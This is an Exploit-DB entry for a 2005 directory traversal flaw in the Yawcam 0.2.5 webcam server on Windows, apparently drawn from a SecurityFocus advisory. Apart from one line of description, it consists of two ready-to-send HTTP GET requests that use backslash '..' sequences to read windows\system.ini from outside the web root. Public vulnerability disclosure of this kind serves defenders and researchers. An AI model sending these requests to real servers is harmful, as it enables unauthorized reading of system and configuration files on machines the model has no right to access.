yawcam 0.2.5 - Directory Traversal

EDB-ID:

25487

CVE:

N/A




Platform:

Windows

Date:

2005-04-21


source: https://www.securityfocus.com/bid/13295/info

Yawcam is prone to a directory traversal vulnerability that could allow attackers to read files outside the Web root. 

GET ..\..\..\..\..\..\..\..\windows\system.ini HTTP/1.0

GET \..\..\..\..\..\..\..\..\windows\system.ini HTTP/1.0